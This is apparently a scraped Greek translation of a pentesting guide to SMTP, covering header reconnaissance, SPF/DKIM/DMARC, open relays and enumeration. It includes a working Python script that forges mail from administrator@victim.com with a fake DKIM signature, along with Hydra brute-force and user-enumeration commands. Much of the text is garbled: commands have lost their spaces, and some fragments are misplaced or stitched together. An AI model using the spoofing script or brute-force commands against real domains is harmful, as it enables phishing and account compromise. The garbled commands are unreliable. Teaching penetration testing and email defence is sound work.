Αποκτήστε την προοπτική ενός χάκερ για τις διαδικτυακές σας εφαρμογές, το δίκτυο και το cloud
Βρείτε και αναφέρετε κρίσιμες, εκμεταλλεύσιμες ευπάθειες με πραγματικό επιχειρηματικό αντίκτυπο. Χρησιμοποιήστε τα 20+ προσαρμοσμένα εργαλεία μας για να χαρτογραφήσετε την επιφάνεια επίθεσης, να βρείτε ζητήματα ασφαλείας που σας επιτρέπουν να κλιμακώσετε δικαιώματα και να χρησιμοποιήσετε αυτοματοποιημένες εκμεταλλεύσεις για να συλλέξετε βασικά αποδεικτικά στοιχεία, μετατρέποντας τη σκληρή σας δουλειά σε πειστικές αναφορές.
Βασικές Πληροφορίες
Το Simple Mail Transfer Protocol (SMTP) είναι ένα πρωτόκολλο που χρησιμοποιείται μέσα στην σουίτα TCP/IP για την αποστολή και λήψη e-mail. Λόγω των περιορισμών του στην ουρά μηνυμάτων στο τέλος του παραλήπτη, το SMTP συχνά χρησιμοποιείται παράλληλα με το POP3 ή IMAP. Αυτά τα επιπλέον πρωτόκολλα επιτρέπουν στους χρήστες να αποθηκεύουν μηνύματα σε ένα διακομιστή ταχυδρομείου και να τα κατεβάζουν περιοδικά.
Στην πράξη, είναι κοινό για τα προγράμματα e-mail να χρησιμοποιούν SMTP για την αποστολή e-mails, ενώ χρησιμοποιούν POP3 ή IMAP για την λήψη τους. Σε συστήματα βασισμένα σε Unix, το sendmail ξεχωρίζει ως ο διακομιστής SMTP που χρησιμοποιείται πιο συχνά για σκοπούς e-mail. Το εμπορικό πακέτο που ονομάζεται Sendmail περιλαμβάνει έναν διακομιστή POP3. Επιπλέον, το Microsoft Exchange παρέχει έναν διακομιστή SMTP και προσφέρει την επιλογή να συμπεριληφθεί υποστήριξη POP3.
Προεπιλεγμένη θύρα: 25,465(ssl),587(ssl)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
EMAIL Headers
Αν έχετε την ευκαιρία να κάνετε το θύμα να σας στείλει ένα email (μέσω της φόρμας επικοινωνίας της ιστοσελίδας για παράδειγμα), κάντε το γιατί μπορείτε να μάθετε για την εσωτερική τοπολογία του θύματος βλέποντας τα headers του email.
Μπορείτε επίσης να λάβετε ένα email από έναν SMTP server προσπαθώντας να στείλετε σε αυτόν τον server ένα email σε μια ανύπαρκτη διεύθυνση (γιατί ο server θα στείλει στον επιτιθέμενο ένα NDN email). Αλλά, βεβαιωθείτε ότι στέλνετε το email από μια επιτρεπόμενη διεύθυνση (ελέγξτε την πολιτική SPF) και ότι μπορείτε να λάβετε NDN μηνύματα.
Πρέπει επίσης να προσπαθήσετε να στείλετε διαφορετικά περιεχόμενα γιατί μπορείτε να βρείτε πιο ενδιαφέρουσες πληροφορίες στα headers όπως: X-Virus-Scanned: by av.domain.com
Πρέπει να στείλετε το αρχείο δοκιμής EICAR.
Η ανίχνευση του AV μπορεί να σας επιτρέψει να εκμεταλλευτείτε γνωστές ευπάθειες.
Basic actions
Banner Grabbing/Basic connection
SMTP:
nc-vn<IP>25
SMTPS:
openssls_client-crlf-connectsmtp.mailgun.org:465#SSL/TLS without starttls commandopenssls_client-starttlssmtp-crlf-connectsmtp.mailgun.org:587
Αποκτήστε την προοπτική ενός χάκερ για τις διαδικτυακές σας εφαρμογές, το δίκτυο και το cloud
Βρείτε και αναφέρετε κρίσιμες, εκμεταλλεύσιμες ευπάθειες με πραγματικό επιχειρηματικό αντίκτυπο. Χρησιμοποιήστε τα 20+ προσαρμοσμένα εργαλεία μας για να χαρτογραφήσετε την επιφάνεια επίθεσης, να βρείτε ζητήματα ασφαλείας που σας επιτρέπουν να κλιμακώσετε τα δικαιώματα και να χρησιμοποιήσετε αυτοματοποιημένες εκμεταλλεύσεις για να συλλέξετε βασικά αποδεικτικά στοιχεία, μετατρέποντας τη σκληρή σας δουλειά σε πειστικές αναφορές.
DSN Reports
Αναφορές Κατάστασης Παράδοσης: Εάν στείλετε ένα email σε έναν οργανισμό σε μια μη έγκυρη διεύθυνση, ο οργανισμός θα σας ειδοποιήσει ότι η διεύθυνση ήταν μη έγκυρη στέλνοντας ένα mail πίσω σε εσάς. Οι επικεφαλίδες του επιστραφέντος email θα περιέχουν πιθανές ευαίσθητες πληροφορίες (όπως η διεύθυνση IP των υπηρεσιών email που αλληλεπίδρασαν με τις αναφορές ή πληροφορίες λογισμικού antivirus).
print("[***]successfully sent email to %s:" % (msg['To']))
</details>
## SMTP Smuggling
Η ευπάθεια SMTP Smuggling επέτρεψε την παράκαμψη όλων των προστασιών SMTP (δείτε την επόμενη ενότητα για περισσότερες πληροφορίες σχετικά με τις προστασίες). Για περισσότερες πληροφορίες σχετικά με το SMTP Smuggling, δείτε:
<div data-gb-custom-block data-tag="content-ref" data-url='smtp-smuggling.md'>
[smtp-smuggling.md](smtp-smuggling.md)
</div>
## Mail Spoofing Countermeasures
Οι οργανισμοί αποτρέπονται από το να στέλνουν μη εξουσιοδοτημένα email εκ μέρους τους, χρησιμοποιώντας **SPF**, **DKIM** και **DMARC** λόγω της ευκολίας παραποίησης των μηνυμάτων SMTP.
Ένας **ολοκληρωμένος οδηγός για αυτές τις αντεπίθεσεις** είναι διαθέσιμος στο [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
### SPF
<div data-gb-custom-block data-tag="hint" data-style='danger'>
Το SPF [ήταν "παρωχημένο" το 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Αυτό σημαίνει ότι αντί να δημιουργήσετε ένα **TXT record** στο `_spf.domain.com`, το δημιουργείτε στο `domain.com` χρησιμοποιώντας την **ίδια σύνταξη**.\
Επιπλέον, για να επαναχρησιμοποιήσετε προηγούμενα SPF records, είναι αρκετά συνηθισμένο να βρείτε κάτι σαν `"v=spf1 include:_spf.google.com ~all"`
</div>
**Sender Policy Framework** (SPF) είναι ένας μηχανισμός που επιτρέπει στους Mail Transfer Agents (MTAs) να επαληθεύουν αν ένας host που στέλνει ένα email είναι εξουσιοδοτημένος, ερωτώντας μια λίστα εξουσιοδοτημένων mail servers που ορίζονται από τους οργανισμούς. Αυτή η λίστα, η οποία καθορίζει διευθύνσεις IP/εύρη, τομείς και άλλες οντότητες **εξουσιοδοτημένες να στέλνουν email εκ μέρους ενός ονόματος τομέα**, περιλαμβάνει διάφορους "**Μηχανισμούς**" στο SPF record.
#### Μηχανισμοί
Από [Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework):
| Μηχανισμός | Περιγραφή |
| ----------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | Ταιριάζει πάντα; χρησιμοποιείται για ένα προεπιλεγμένο αποτέλεσμα όπως το `-all` για όλες τις IP που δεν ταιριάζουν με τους προηγούμενους μηχανισμούς. |
| A | Αν το όνομα τομέα έχει ένα record διεύθυνσης (A ή AAAA) που μπορεί να επιλυθεί στη διεύθυνση του αποστολέα, θα ταιριάξει. |
| IP4 | Αν ο αποστολέας είναι σε μια δεδομένη περιοχή διευθύνσεων IPv4, ταιριάζει. |
| IP6 | Αν ο αποστολέας είναι σε μια δεδομένη περιοχή διευθύνσεων IPv6, ταιριάζει. |
| MX | Αν το όνομα τομέα έχει ένα MX record που επιλύεται στη διεύθυνση του αποστολέα, θα ταιριάξει (δηλαδή, το email προέρχεται από έναν από τους εισερχόμενους mail servers του τομέα). |
| PTR | Αν το όνομα τομέα (record PTR) για τη διεύθυνση του πελάτη είναι στον δεδομένο τομέα και αυτό το όνομα τομέα επιλύεται στη διεύθυνση του πελάτη (forward-confirmed reverse DNS), ταιριάζει. Αυτός ο μηχανισμός αποθαρρύνεται και θα πρέπει να αποφεύγεται, αν είναι δυνατόν. |
| EXISTS | Αν το δεδομένο όνομα τομέα επιλύεται σε οποιαδήποτε διεύθυνση, ταιριάζει (δεν έχει σημασία η διεύθυνση στην οποία επιλύεται). Αυτό χρησιμοποιείται σπάνια. Μαζί με τη γλώσσα μακροεντολών SPF προσφέρει πιο σύνθετους ταιριάσματος όπως DNSBL-queries. |
| INCLUDE | Αναφέρεται στην πολιτική ενός άλλου τομέα. Αν η πολιτική αυτού του τομέα περάσει, αυτός ο μηχανισμός περνά. Ωστόσο, αν η συμπεριλαμβανόμενη πολιτική αποτύχει, η επεξεργασία συνεχίζεται. Για να ανατεθεί πλήρως σε μια πολιτική άλλου τομέα, πρέπει να χρησιμοποιηθεί η επέκταση redirect. |
| REDIRECT | <p>Μια ανακατεύθυνση είναι ένας δείκτης σε ένα άλλο όνομα τομέα που φιλοξενεί μια πολιτική SPF, επιτρέπει σε πολλούς τομείς να μοιράζονται την ίδια πολιτική SPF. Είναι χρήσιμο όταν εργάζεστε με μεγάλο αριθμό τομέων που μοιράζονται την ίδια υποδομή email.</p><p>Η πολιτική SPF του τομέα που υποδεικνύεται στη μηχανισμό ανακατεύθυνσης θα χρησιμοποιηθεί.</p> |
Είναι επίσης δυνατό να προσδιοριστούν **Ποιοτικοί δείκτες** που υποδεικνύουν **τι πρέπει να γίνει αν ταιριάξει ένας μηχανισμός**. Από προεπιλογή, χρησιμοποιείται ο **ποιοτικός δείκτης "+"** (έτσι αν ταιριάξει οποιοσδήποτε μηχανισμός, αυτό σημαίνει ότι επιτρέπεται).\
Συνήθως θα παρατηρήσετε **στο τέλος κάθε πολιτικής SPF** κάτι σαν: **\~all** ή **-all**. Αυτό χρησιμοποιείται για να υποδείξει ότι **αν ο αποστολέας δεν ταιριάζει με καμία πολιτική SPF, θα πρέπει να επισημάνετε το email ως μη αξιόπιστο (\~) ή να απορρίψετε (-) το email.**
#### Ποιοτικοί δείκτες
Κάθε μηχανισμός εντός της πολιτικής μπορεί να έχει πρόθεμα έναν από τους τέσσερις ποιοτικούς δείκτες για να καθορίσει το επιθυμητό αποτέλεσμα:
* **`+`**: Αντιστοιχεί σε ένα αποτέλεσμα PASS. Από προεπιλογή, οι μηχανισμοί υποθέτουν αυτόν τον ποιοτικό δείκτη, κάνοντάς το `+mx` ισοδύναμο με `mx`.
* **`?`**: Αντιπροσωπεύει ένα αποτέλεσμα NEUTRAL, που αντιμετωπίζεται παρόμοια με το NONE (καμία συγκεκριμένη πολιτική).
* **`~`**: Υποδηλώνει SOFTFAIL, λειτουργώντας ως ενδιάμεσος χώρος μεταξύ NEUTRAL και FAIL. Τα emails που πληρούν αυτό το αποτέλεσμα γίνονται συνήθως αποδεκτά αλλά επισημαίνονται αναλόγως.
* **`-`**: Υποδηλώνει FAIL, προτείνοντας ότι το email θα πρέπει να απορριφθεί εντελώς.
Στο επόμενο παράδειγμα, απεικονίζεται η **πολιτική SPF του google.com**. Σημειώστε την συμπερίληψη πολιτικών SPF από διαφορετικούς τομείς εντός της πρώτης πολιτικής SPF:
```shell-session
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
Παραδοσιακά, ήταν δυνατό να παραποιηθεί οποιοδήποτε όνομα τομέα που δεν είχε σωστό/κανένα SPF record. Σήμερα, αν το email προέρχεται από έναν τομέα χωρίς έγκυρο SPF record, είναι πιθανό να απορριφθεί/σημανθεί ως μη αξιόπιστο αυτόματα.
Το DKIM χρησιμοποιείται για να υπογράφει τα εξερχόμενα emails, επιτρέποντας την επικύρωσή τους από εξωτερικούς Mail Transfer Agents (MTAs) μέσω της ανάκτησης του δημόσιου κλειδιού του τομέα από το DNS. Αυτό το δημόσιο κλειδί βρίσκεται στο TXT record ενός τομέα. Για να αποκτήσετε αυτό το κλειδί, πρέπει να γνωρίζετε τόσο τον επιλεγέα όσο και το όνομα του τομέα.
Για παράδειγμα, για να ζητήσετε το κλειδί, το όνομα του τομέα και ο επιλεγέας είναι απαραίτητα. Αυτά μπορούν να βρεθούν στην κεφαλίδα email DKIM-Signature, π.χ., d=gmail.com;s=20120113.
Μια εντολή για να ανακτήσετε αυτές τις πληροφορίες μπορεί να μοιάζει με:
dig20120113._domainkey.gmail.comTXT|grepp=# This command would return something like:20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
Το DMARC ενισχύει την ασφάλεια των email βασιζόμενο στα πρωτόκολλα SPF και DKIM. Περιγράφει πολιτικές που καθοδηγούν τους mail servers στη διαχείριση των email από μια συγκεκριμένη τομέα, συμπεριλαμβανομένου του τρόπου αντιμετώπισης αποτυχιών αυθεντικοποίησης και πού να στείλουν αναφορές σχετικά με τις ενέργειες επεξεργασίας email.
Για να αποκτήσετε το DMARC record, πρέπει να κάνετε ερώτηση στο υποτομέα _dmarc
Απόεδώ.
Πρέπει να έχετε ξεχωριστές εγγραφές SPF για κάθε υποτομέα από τον οποίο θέλετε να στείλετε email.
Τα παρακάτω δημοσιεύτηκαν αρχικά στο openspf.org, το οποίο ήταν μια εξαιρετική πηγή για αυτό το είδος πληροφοριών.
Η Ερώτηση του Demon: Τι γίνεται με τους υποτομείς;
Αν λάβω email από pielovers.demon.co.uk, και δεν υπάρχουν δεδομένα SPF για pielovers, πρέπει να επιστρέψω ένα επίπεδο και να ελέγξω το SPF για demon.co.uk; Όχι. Κάθε υποτομέας στο Demon είναι διαφορετικός πελάτης, και κάθε πελάτης μπορεί να έχει τη δική του πολιτική. Δεν θα είχε νόημα η πολιτική του Demon να ισχύει για όλους τους πελάτες του από προεπιλογή; Αν το Demon θέλει να το κάνει αυτό, μπορεί να ρυθμίσει εγγραφές SPF για κάθε υποτομέα.
Έτσι, η συμβουλή προς τους εκδότες SPF είναι αυτή: θα πρέπει να προσθέσετε μια εγγραφή SPF για κάθε υποτομέα ή όνομα υπολογιστή που έχει εγγραφή A ή MX.
Ιστοσελίδες με wildcard A ή MX εγγραφές θα πρέπει επίσης να έχουν μια wildcard SPF εγγραφή, της μορφής: * IN TXT "v=spf1 -all"
Αυτό έχει νόημα - ένας υποτομέας μπορεί να βρίσκεται σε διαφορετική γεωγραφική τοποθεσία και να έχει πολύ διαφορετικό ορισμό SPF.
Ανοιχτό Relay
Όταν αποστέλλονται emails, η διασφάλιση ότι δεν θα χαρακτηριστούν ως spam είναι κρίσιμη. Αυτό συχνά επιτυγχάνεται μέσω της χρήσης ενός relay server που είναι αξιόπιστος από τον παραλήπτη. Ωστόσο, μια κοινή πρόκληση είναι ότι οι διαχειριστές μπορεί να μην είναι πλήρως ενήμεροι για το ποιες IP διευθύνσεις είναι ασφαλείς να επιτραπούν. Αυτή η έλλειψη κατανόησης μπορεί να οδηγήσει σε λάθη στη ρύθμιση του SMTP server, ένας κίνδυνος που συχνά εντοπίζεται σε αξιολογήσεις ασφάλειας.
Μια λύση που χρησιμοποιούν ορισμένοι διαχειριστές για να αποφύγουν προβλήματα παράδοσης email, ειδικά όσον αφορά τις επικοινωνίες με πιθανούς ή τρέχοντες πελάτες, είναι να επιτρέπουν συνδέσεις από οποιαδήποτε IP διεύθυνση. Αυτό γίνεται ρυθμίζοντας την παράμετρο mynetworks του SMTP server να αποδέχεται όλες τις IP διευθύνσεις, όπως φαίνεται παρακάτω:
mynetworks=0.0.0.0/0
Για να ελέγξετε αν ένας διακομιστής αλληλογραφίας είναι ανοιχτός διαμεσολαβητής (που σημαίνει ότι θα μπορούσε να προωθήσει email από οποιαδήποτε εξωτερική πηγή), το εργαλείο nmap χρησιμοποιείται συνήθως. Περιλαμβάνει ένα συγκεκριμένο σενάριο σχεδιασμένο για να το δοκιμάσει. Η εντολή για να διεξάγετε μια λεπτομερή σάρωση σε έναν διακομιστή (για παράδειγμα, με IP 10.10.10.10) στην πόρτα 25 χρησιμοποιώντας το nmap είναι:
# This will send a test email from test@victim.com to destination@gmail.compython3magicspoofmail.py-dvictim.com-t-edestination@gmail.com# But you can also modify more options of the emailpython3magicspoofmail.py-dvictim.com-t-edestination@gmail.com--subjectTEST--senderadministrator@victim.com
Αν λάβετε οποιοδήποτε σφάλμα κατά τη χρήση της βιβλιοθήκης dkim python για την ανάλυση του κλειδιού, μη διστάσετε να χρησιμοποιήσετε αυτήν την παρακάτω.
ΣΗΜΕΙΩΣΗ: Αυτό είναι απλώς μια πρόχειρη λύση για να κάνετε γρήγορες ελέγχους σε περιπτώσεις όπου για κάποιο λόγο το ιδιωτικό κλειδί openssl δεν μπορεί να αναλυθεί από το dkim.
# Αυτό θα στείλει ένα μη υπογεγραμμένο μήνυμαmail("your_email@gmail.com", "Δοκιμαστικός Θέμα!", "γεια! Αυτό είναι μια δοκιμή", "Από: administrator@victim.com");# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.pyimport osimport dkim #pip3 install dkimpyimport smtplibfrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.base import MIMEBase# Set paramsdestination="destination@gmail.com"sender="administrator@victim.com"subject="Test"message_html="""<html><body><h3>This is a test, not a scam</h3><br /></body></html>"""sender_domain=sender.split("@")[1]# Prepare postfixos.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")os.system("systemctl restart postfix")# Generate DKIM keysdkim_private_key_path="dkimprivatekey.pem"os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")with open(dkim_private_key_path) as fh:dkim_private_key = fh.read()# Generate emailmsg = MIMEMultipart("alternative")msg.attach(MIMEText(message_html, "html"))msg["To"] = destinationmsg["From"] = sendermsg["Subject"] = subjectheaders = [b"To", b"From", b"Subject"]msg_data = msg.as_bytes()# Sign email with dkim## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)dkim_selector="s1"sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()msg_data = msg.as_bytes()# Use local postfix relay to send emailsmtp="127.0.0.1"s = smtplib.SMTP(smtp)s.sendmail(sender, [destination], msg_data)
Τιμές που χρησιμοποιούνται που διαφέρουν από αυτές των κεφαλίδων του email
Υπαρξή έγκυρου και αξιόπιστου SSL πιστοποιητικού
Υποβολή της σελίδας σε ιστότοπους φιλτραρίσματος περιεχομένου
Εξαγωγή μέσω SMTP
Αν μπορείτε να στείλετε δεδομένα μέσω SMTPδιαβάστε αυτό.
Αρχείο ρυθμίσεων
Postfix
Συνήθως, αν είναι εγκατεστημένο, στο /etc/postfix/master.cf περιέχει σενάρια προς εκτέλεση όταν, για παράδειγμα, παραληφθεί ένα νέο email από έναν χρήστη. Για παράδειγμα, η γραμμή flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} σημαίνει ότι το /etc/postfix/filtering θα εκτελείται αν παραληφθεί ένα νέο email από τον χρήστη mark.
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
https://book.hacktricks.xyz/pentesting/pentesting-smtp
Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25
Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
Αποκτήστε την προοπτική ενός χάκερ για τις διαδικτυακές σας εφαρμογές, το δίκτυο και το cloud
Βρείτε και αναφέρετε κρίσιμες, εκμεταλλεύσιμες ευπάθειες με πραγματικό επιχειρηματικό αντίκτυπο. Χρησιμοποιήστε τα 20+ προσαρμοσμένα εργαλεία μας για να χαρτογραφήσετε την επιφάνεια επίθεσης, να βρείτε ζητήματα ασφαλείας που σας επιτρέπουν να κλιμακώσετε προνόμια και να χρησιμοποιήσετε αυτοματοποιημένες εκμεταλλεύσεις για να συλλέξετε βασικά αποδεικτικά στοιχεία, μετατρέποντας τη σκληρή σας δουλειά σε πειστικές αναφορές.